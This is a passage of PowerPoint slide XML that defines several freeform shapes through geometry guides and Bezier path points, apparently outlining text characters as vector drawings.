                <a:gd name="T29" fmla="*/ 222 h 316"/>
                <a:gd name="T30" fmla="*/ 41 w 209"/>
                <a:gd name="T31" fmla="*/ 220 h 316"/>
                <a:gd name="T32" fmla="*/ 41 w 209"/>
                <a:gd name="T33" fmla="*/ 215 h 316"/>
                <a:gd name="T34" fmla="*/ 40 w 209"/>
                <a:gd name="T35" fmla="*/ 200 h 316"/>
                <a:gd name="T36" fmla="*/ 107 w 209"/>
                <a:gd name="T37" fmla="*/ 144 h 316"/>
                <a:gd name="T38" fmla="*/ 174 w 209"/>
                <a:gd name="T39" fmla="*/ 214 h 316"/>
                <a:gd name="T40" fmla="*/ 105 w 209"/>
                <a:gd name="T41" fmla="*/ 28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9" h="316">
                  <a:moveTo>
                    <a:pt x="36" y="142"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="72"/>
                    <a:pt x="89" y="31"/>
                    <a:pt x="133" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="31"/>
                    <a:pt x="158" y="36"/>
                    <a:pt x="161" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="41"/>
                    <a:pt x="156" y="44"/>
                    <a:pt x="156" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="65"/>
                    <a:pt x="165" y="75"/>
                    <a:pt x="178" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="75"/>
                    <a:pt x="200" y="67"/>
                    <a:pt x="200" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="27"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="134" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="0"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="280"/>
                    <a:pt x="56" y="316"/>
                    <a:pt x="105" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="316"/>
                    <a:pt x="209" y="274"/>
                    <a:pt x="209" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="157"/>
                    <a:pt x="165" y="113"/>
                    <a:pt x="110" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="113"/>
                    <a:pt x="58" y="121"/>
                    <a:pt x="36" y="142"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="105" y="286"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="286"/>
                    <a:pt x="54" y="261"/>
                    <a:pt x="44" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="228"/>
                    <a:pt x="42" y="225"/>
                    <a:pt x="41" y="222"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="41" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="212"/>
                    <a:pt x="40" y="203"/>
                    <a:pt x="40" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="169"/>
                    <a:pt x="69" y="144"/>
                    <a:pt x="107" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="144"/>
                    <a:pt x="174" y="177"/>
                    <a:pt x="174" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="257"/>
                    <a:pt x="141" y="286"/>
                    <a:pt x="105" y="2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67" name="Freeform 908">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EA5FB9B-C40C-41FC-A86A-BDBB4A4FEED0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId84"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5526088" y="2109788"/>
              <a:ext cx="65088" cy="106363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 305"/>
                <a:gd name="T2" fmla="*/ 95 w 188"/>
                <a:gd name="T3" fmla="*/ 91 h 305"/>
                <a:gd name="T4" fmla="*/ 25 w 188"/>
                <a:gd name="T5" fmla="*/ 91 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 25 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 21 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 21 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 168 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 168 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 305"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 90 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 65 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 90 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 305"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 2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5" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="96"/>
                    <a:pt x="112" y="91"/>
                    <a:pt x="95" y="91"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="91"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="91"/>
                    <a:pt x="4" y="91"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="25" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="21" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="175" y="275"/>
                    <a:pt x="168" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="11"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="90" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="0"/>
                    <a:pt x="65" y="11"/>
                    <a:pt x="65" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="39"/>
                    <a:pt x="76" y="50"/>
                    <a:pt x="90" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="50"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115"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68" name="Freeform 909">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF352A4A-EDC4-4813-AAC9-241DB412A67A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId85"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5614988" y="2109788"/>
              <a:ext cx="69850" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 168 w 203"/>
                <a:gd name="T1" fmla="*/ 30 h 310"/>
                <a:gd name="T2" fmla="*/ 183 w 203"/>
                <a:gd name="T3" fmla="*/ 30 h 310"/>
                <a:gd name="T4" fmla="*/ 203 w 203"/>
                <a:gd name="T5" fmla="*/ 15 h 310"/>
                <a:gd name="T6" fmla="*/ 183 w 203"/>
                <a:gd name="T7" fmla="*/ 0 h 310"/>
                <a:gd name="T8" fmla="*/ 92 w 203"/>
                <a:gd name="T9" fmla="*/ 0 h 310"/>
                <a:gd name="T10" fmla="*/ 72 w 203"/>
                <a:gd name="T11" fmla="*/ 15 h 310"/>
                <a:gd name="T12" fmla="*/ 92 w 203"/>
                <a:gd name="T13" fmla="*/ 30 h 310"/>
                <a:gd name="T14" fmla="*/ 133 w 203"/>
                <a:gd name="T15" fmla="*/ 30 h 310"/>
                <a:gd name="T16" fmla="*/ 133 w 203"/>
                <a:gd name="T17" fmla="*/ 235 h 310"/>
                <a:gd name="T18" fmla="*/ 83 w 203"/>
                <a:gd name="T19" fmla="*/ 280 h 310"/>
                <a:gd name="T20" fmla="*/ 41 w 203"/>
                <a:gd name="T21" fmla="*/ 267 h 310"/>
                <a:gd name="T22" fmla="*/ 45 w 203"/>
                <a:gd name="T23" fmla="*/ 254 h 310"/>
                <a:gd name="T24" fmla="*/ 23 w 203"/>
                <a:gd name="T25" fmla="*/ 232 h 310"/>
                <a:gd name="T26" fmla="*/ 0 w 203"/>
                <a:gd name="T27" fmla="*/ 255 h 310"/>
                <a:gd name="T28" fmla="*/ 83 w 203"/>
                <a:gd name="T29" fmla="*/ 310 h 310"/>
                <a:gd name="T30" fmla="*/ 168 w 203"/>
                <a:gd name="T31" fmla="*/ 238 h 310"/>
                <a:gd name="T32" fmla="*/ 168 w 203"/>
                <a:gd name="T33" fmla="*/ 3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 h="310">
                  <a:moveTo>
                    <a:pt x="168" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="183" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="30"/>
                    <a:pt x="203" y="30"/>
                    <a:pt x="203" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="0"/>
                    <a:pt x="190" y="0"/>
                    <a:pt x="183" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="92" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="0"/>
                    <a:pt x="72" y="0"/>
                    <a:pt x="72" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="30"/>
                    <a:pt x="85" y="30"/>
                    <a:pt x="92" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="133" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="235"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="277"/>
                    <a:pt x="92" y="280"/>
                    <a:pt x="83" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="280"/>
                    <a:pt x="55" y="280"/>
                    <a:pt x="41" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="264"/>
                    <a:pt x="45" y="262"/>
                    <a:pt x="45" y="254"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="242"/>
                    <a:pt x="35" y="232"/>
                    <a:pt x="23" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="232"/>
                    <a:pt x="0" y="239"/>
                    <a:pt x="0" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="287"/>
                    <a:pt x="33" y="310"/>
                    <a:pt x="83" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="310"/>
                    <a:pt x="168" y="283"/>
                    <a:pt x="168" y="238"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168"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69" name="Freeform 910">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B22F82DA-A9DF-4077-BDE7-CEBFD9BD1D68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId86"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5695951" y="2109788"/>
              <a:ext cx="80963" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 238"/>
                <a:gd name="T1" fmla="*/ 111 h 307"/>
                <a:gd name="T2" fmla="*/ 77 w 238"/>
                <a:gd name="T3" fmla="*/ 20 h 307"/>
                <a:gd name="T4" fmla="*/ 57 w 238"/>
                <a:gd name="T5" fmla="*/ 0 h 307"/>
                <a:gd name="T6" fmla="*/ 21 w 238"/>
                <a:gd name="T7" fmla="*/ 0 h 307"/>
                <a:gd name="T8" fmla="*/ 0 w 238"/>
                <a:gd name="T9" fmla="*/ 15 h 307"/>
                <a:gd name="T10" fmla="*/ 20 w 238"/>
                <a:gd name="T11" fmla="*/ 30 h 307"/>
                <a:gd name="T12" fmla="*/ 43 w 238"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 43 w 238"/>
                <a:gd name="T15" fmla="*/ 284 h 307"/>
                <a:gd name="T16" fmla="*/ 60 w 238"/>
                <a:gd name="T17" fmla="*/ 304 h 307"/>
                <a:gd name="T18" fmla="*/ 77 w 238"/>
                <a:gd name="T19" fmla="*/ 282 h 307"/>
                <a:gd name="T20" fmla="*/ 135 w 238"/>
                <a:gd name="T21" fmla="*/ 307 h 307"/>
                <a:gd name="T22" fmla="*/ 238 w 238"/>
                <a:gd name="T23" fmla="*/ 197 h 307"/>
                <a:gd name="T24" fmla="*/ 140 w 238"/>
                <a:gd name="T25" fmla="*/ 87 h 307"/>
                <a:gd name="T26" fmla="*/ 77 w 238"/>
                <a:gd name="T27" fmla="*/ 111 h 307"/>
                <a:gd name="T28" fmla="*/ 77 w 238"/>
                <a:gd name="T29" fmla="*/ 209 h 307"/>
                <a:gd name="T30" fmla="*/ 77 w 238"/>
                <a:gd name="T31" fmla="*/ 173 h 307"/>
                <a:gd name="T32" fmla="*/ 137 w 238"/>
                <a:gd name="T33" fmla="*/ 117 h 307"/>
                <a:gd name="T34" fmla="*/ 203 w 238"/>
                <a:gd name="T35" fmla="*/ 197 h 307"/>
                <a:gd name="T36" fmla="*/ 133 w 238"/>
                <a:gd name="T37" fmla="*/ 277 h 307"/>
                <a:gd name="T38" fmla="*/ 77 w 238"/>
                <a:gd name="T39" fmla="*/ 209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8" h="307">
                  <a:moveTo>
                    <a:pt x="77" y="111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="77" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="5"/>
                    <a:pt x="74" y="0"/>
                    <a:pt x="57" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="43" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="284"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="294"/>
                    <a:pt x="43" y="304"/>
                    <a:pt x="60" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="304"/>
                    <a:pt x="77" y="294"/>
                    <a:pt x="77" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="303"/>
                    <a:pt x="119" y="307"/>
                    <a:pt x="135" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="307"/>
                    <a:pt x="238" y="260"/>
                    <a:pt x="238" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="135"/>
                    <a:pt x="193" y="87"/>
                    <a:pt x="140" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="87"/>
                    <a:pt x="94" y="96"/>
                    <a:pt x="77" y="111"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="77" y="209"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="77" y="173"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="143"/>
                    <a:pt x="106" y="117"/>
                    <a:pt x="137" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="117"/>
                    <a:pt x="203" y="153"/>
                    <a:pt x="203" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="245"/>
                    <a:pt x="168" y="277"/>
                    <a:pt x="133" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="277"/>
                    <a:pt x="77" y="233"/>
                    <a:pt x="77" y="20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70" name="Freeform 911">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81600A75-F4A5-4E52-83A0-677B0658FD63}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId87"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5788026" y="2109788"/>
              <a:ext cx="80963" cy="106363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 132 w 234"/>
                <a:gd name="T1" fmla="*/ 142 h 304"/>
                <a:gd name="T2" fmla="*/ 188 w 234"/>
                <a:gd name="T3" fmla="*/ 30 h 304"/>
                <a:gd name="T4" fmla="*/ 199 w 234"/>
                <a:gd name="T5" fmla="*/ 30 h 304"/>
                <a:gd name="T6" fmla="*/ 220 w 234"/>
                <a:gd name="T7" fmla="*/ 15 h 304"/>
                <a:gd name="T8" fmla="*/ 199 w 234"/>
                <a:gd name="T9" fmla="*/ 0 h 304"/>
                <a:gd name="T10" fmla="*/ 147 w 234"/>
                <a:gd name="T11" fmla="*/ 0 h 304"/>
                <a:gd name="T12" fmla="*/ 127 w 234"/>
                <a:gd name="T13" fmla="*/ 15 h 304"/>
                <a:gd name="T14" fmla="*/ 150 w 234"/>
                <a:gd name="T15" fmla="*/ 30 h 304"/>
                <a:gd name="T16" fmla="*/ 115 w 234"/>
                <a:gd name="T17" fmla="*/ 103 h 304"/>
                <a:gd name="T18" fmla="*/ 77 w 234"/>
                <a:gd name="T19" fmla="*/ 30 h 304"/>
                <a:gd name="T20" fmla="*/ 98 w 234"/>
                <a:gd name="T21" fmla="*/ 15 h 304"/>
                <a:gd name="T22" fmla="*/ 78 w 234"/>
                <a:gd name="T23" fmla="*/ 0 h 304"/>
                <a:gd name="T24" fmla="*/ 26 w 234"/>
                <a:gd name="T25" fmla="*/ 0 h 304"/>
                <a:gd name="T26" fmla="*/ 6 w 234"/>
                <a:gd name="T27" fmla="*/ 15 h 304"/>
                <a:gd name="T28" fmla="*/ 26 w 234"/>
                <a:gd name="T29" fmla="*/ 30 h 304"/>
                <a:gd name="T30" fmla="*/ 38 w 234"/>
                <a:gd name="T31" fmla="*/ 30 h 304"/>
                <a:gd name="T32" fmla="*/ 97 w 234"/>
                <a:gd name="T33" fmla="*/ 142 h 304"/>
                <a:gd name="T34" fmla="*/ 31 w 234"/>
                <a:gd name="T35" fmla="*/ 274 h 304"/>
                <a:gd name="T36" fmla="*/ 20 w 234"/>
                <a:gd name="T37" fmla="*/ 274 h 304"/>
                <a:gd name="T38" fmla="*/ 0 w 234"/>
                <a:gd name="T39" fmla="*/ 289 h 304"/>
                <a:gd name="T40" fmla="*/ 20 w 234"/>
                <a:gd name="T41" fmla="*/ 304 h 304"/>
                <a:gd name="T42" fmla="*/ 72 w 234"/>
                <a:gd name="T43" fmla="*/ 304 h 304"/>
                <a:gd name="T44" fmla="*/ 93 w 234"/>
                <a:gd name="T45" fmla="*/ 289 h 304"/>
                <a:gd name="T46" fmla="*/ 69 w 234"/>
                <a:gd name="T47" fmla="*/ 274 h 304"/>
                <a:gd name="T48" fmla="*/ 115 w 234"/>
                <a:gd name="T49" fmla="*/ 177 h 304"/>
                <a:gd name="T50" fmla="*/ 164 w 234"/>
                <a:gd name="T51" fmla="*/ 274 h 304"/>
                <a:gd name="T52" fmla="*/ 142 w 234"/>
                <a:gd name="T53" fmla="*/ 289 h 304"/>
                <a:gd name="T54" fmla="*/ 162 w 234"/>
                <a:gd name="T55" fmla="*/ 304 h 304"/>
                <a:gd name="T56" fmla="*/ 214 w 234"/>
                <a:gd name="T57" fmla="*/ 304 h 304"/>
                <a:gd name="T58" fmla="*/ 234 w 234"/>
                <a:gd name="T59" fmla="*/ 289 h 304"/>
                <a:gd name="T60" fmla="*/ 214 w 234"/>
                <a:gd name="T61" fmla="*/ 274 h 304"/>
                <a:gd name="T62" fmla="*/ 202 w 234"/>
                <a:gd name="T63" fmla="*/ 274 h 304"/>
                <a:gd name="T64" fmla="*/ 132 w 234"/>
                <a:gd name="T65" fmla="*/ 14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4" h="304">
                  <a:moveTo>
                    <a:pt x="132" y="142"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="188" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="30"/>
                    <a:pt x="220" y="30"/>
                    <a:pt x="220" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="0"/>
                    <a:pt x="207" y="0"/>
                    <a:pt x="199" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="147" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="0"/>
                    <a:pt x="127" y="0"/>
                    <a:pt x="127" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="30"/>
                    <a:pt x="139" y="30"/>
                    <a:pt x="150" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="30"/>
                    <a:pt x="98" y="30"/>
                    <a:pt x="98" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="0"/>
                    <a:pt x="86" y="0"/>
                    <a:pt x="78" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="0"/>
                    <a:pt x="6" y="0"/>
                    <a:pt x="6" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="30"/>
                    <a:pt x="19" y="30"/>
                    <a:pt x="26" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="38" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="304"/>
                    <a:pt x="93" y="304"/>
                    <a:pt x="93" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="274"/>
                    <a:pt x="81" y="274"/>
                    <a:pt x="69" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="274"/>
                    <a:pt x="142" y="274"/>
                    <a:pt x="142" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="304"/>
                    <a:pt x="154" y="304"/>
                    <a:pt x="162" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="214" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="304"/>
                    <a:pt x="234" y="304"/>
                    <a:pt x="234" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="274"/>
                    <a:pt x="221" y="274"/>
                    <a:pt x="214" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="202" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132" y="14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71" name="Freeform 912">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C233CFD6-DC27-4C89-B5CD-594504E3EC9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId88"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5878513" y="2109788"/>
              <a:ext cx="79375" cy="106363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 231"/>
                <a:gd name="T1" fmla="*/ 167 h 304"/>
                <a:gd name="T2" fmla="*/ 139 w 231"/>
                <a:gd name="T3" fmla="*/ 167 h 304"/>
                <a:gd name="T4" fmla="*/ 157 w 231"/>
                <a:gd name="T5" fmla="*/ 196 h 304"/>
                <a:gd name="T6" fmla="*/ 174 w 231"/>
                <a:gd name="T7" fmla="*/ 175 h 304"/>
                <a:gd name="T8" fmla="*/ 174 w 231"/>
                <a:gd name="T9" fmla="*/ 129 h 304"/>
                <a:gd name="T10" fmla="*/ 157 w 231"/>
                <a:gd name="T11" fmla="*/ 108 h 304"/>
                <a:gd name="T12" fmla="*/ 139 w 231"/>
                <a:gd name="T13" fmla="*/ 137 h 304"/>
                <a:gd name="T14" fmla="*/ 72 w 231"/>
                <a:gd name="T15" fmla="*/ 137 h 304"/>
